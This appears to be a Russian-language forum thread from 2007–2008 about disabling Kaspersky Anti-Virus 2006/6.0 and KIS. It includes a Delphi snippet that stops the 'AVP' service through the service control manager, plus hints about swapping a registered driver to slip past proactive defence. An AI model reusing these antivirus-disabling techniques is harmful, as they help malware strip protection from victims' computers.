KAV 2006 и его убийтсво

grnic · 4 фев 2007

Cr4sh сказал(а):

>> а поподробнее?
поиск по форуму, такой топик был недавно

>> Даст ли Кашперский доступ к /Device/PhisycalMemory ?
даст, только что пробовал на самой свежей бетке KIS-а, могу дать код если нужно (в асю)
Нажмите, чтобы раскрыть...

Проактивка ругается при попытке доступа к /Device/PhisycalMemory...

grnic · 4 фев 2007

OioVologda сказал(а):

ринг 3 бессилен ПО ОПРЕДЕЛЕНИЮ. Но если есть привилегии админа, то почему бы не подгрузить драйвер? Из под юзверя все равно никто никого завалить не даст.
Нажмите, чтобы раскрыть...

Но ведь на загрузку драйвера KAV выдаст красный алерт проактивки?

Cr4sh · 5 фев 2007

>> Но ведь на загрузку драйвера KAV выдаст красный алерт проактивки?

смотря как грузить)

apple · 5 фев 2007

смотря как грузить)
Нажмите, чтобы раскрыть...

А по подробнее )

grnic · 5 фев 2007

Cr4sh сказал(а):

>> Но ведь на загрузку драйвера KAV выдаст красный алерт проактивки?

смотря как грузить)
Нажмите, чтобы раскрыть...

И _как_ же надо грузить?!

n0name · 5 фев 2007

А по подробнее )
Нажмите, чтобы раскрыть...

Дык он уже сколько раз писал, что заменяем уже зарегестрированный драйвер на свой, и грузим.

UPI · 5 фев 2007

Вообще-то это делается просто. Если это KAV, то останавливаем службу. Если KIS, то тут необходимо подумать. Я делал это пол года назад, не помню, по моему там нужно изменить параметры службы KIS.

Twister · 5 фев 2007

RamMerLabs сказал(а):

значит Process Explorer врёт!
Нажмите, чтобы раскрыть...

Кстати, не исключено. Где-то на форуме я давно поднимал топик, в котором у меня "потерялся" DebugObject. Оказалось ProcessExplorer вместе с Руссиновичем нагло врали...

k3internal · 6 фев 2007

grnic
дадада. Щас тебе всё рассказали. Шобы дятьки из кала пропатчили.

UPI · 6 фев 2007

А ты хоть за патчся, все равно умные люди поломают весь этот бизнес, когда им это надо будет. Касперский зависит от умных людей. А они от него нет, ибо на то они и умные, чтобы обходить все, на чем он делает деньги. Ему просто дают это делать, иначе ему бы очень много нужно было бы работать над созданием антивируса, в котором нет ни багов, ни откровенных дыр в системе безопасности. Простой пример "откровенной бреши", следующий небольшой код для KAV 6.0

Код (Text):

LSCMHandle:=OpenSCManager(nil,nil,SC_MANAGER_ALL_ACCESS);

if LSCMHandle<>0 then

begin

LHandle:=OpenService(LSCMHandle,'AVP',SERVICE_ALL_ACCESS);

if LHandle<>0 then

begin

QueryServiceStatus(LHandle,ServiceStatus);

if ServiceStatus.dwCurrentState=SERVICE_RUNNING then

ControlService(LHandle,SERVICE_CONTROL_STOP,ServiceStatus);

CloseServiceHandle(LHandle);

end;

CloseServiceHandle(LSCMHandle);

end;

Че сделать с KIS я думаю, кому надо тот догадается.

k3internal · 7 фев 2007

UPI
да у кава и посерьёзнее дырка есть ))

PaCHER · 9 дек 2008

maxdiver
вообще не ту тему открылА
я ещё удивилсЯ, кому до сих пор нужен шестой каспер ))
хм какойже тут пол.

OxBADC0DE · 9 дек 2008

опера проглючила открыла
я удивился
=)

AndreyMust19 · 13 дек 2008

А может быть можно побить антивирус сообщениями?
Посылаем сообщения интерефейсу (чтобы открыть антивирус, закрыть его или отключить в опциях драйвер).

Booster · 13 дек 2008

AndreyMust19
AFAIK сам антивирь не имеет интерфейса, он в виде сервиса.

K10 · 13 дек 2008

Зачем его вобще убивать?

Войти или зарегистрироваться

KAV 2006 и его убийтсво

grnic New Member

grnic New Member

Cr4sh New Member

apple Виктор

grnic New Member

n0name New Member

UPI New Member

Twister New Member

k3internal New Member

UPI New Member

k3internal New Member

PaCHER New Member

OxBADC0DE Олег aka Executioner

AndreyMust19 New Member

Booster New Member

K10 New Member

Войти или зарегистрироваться

KAV 2006 и его убийтсво

grnic New Member

grnic New Member

Cr4sh New Member

apple Виктор

grnic New Member

n0name New Member

UPI New Member

Twister New Member

k3internal New Member

UPI New Member

k3internal New Member

PaCHER New Member

OxBADC0DE Олег aka Executioner

AndreyMust19 New Member

Booster New Member

K10 New Member

Быстрый поиск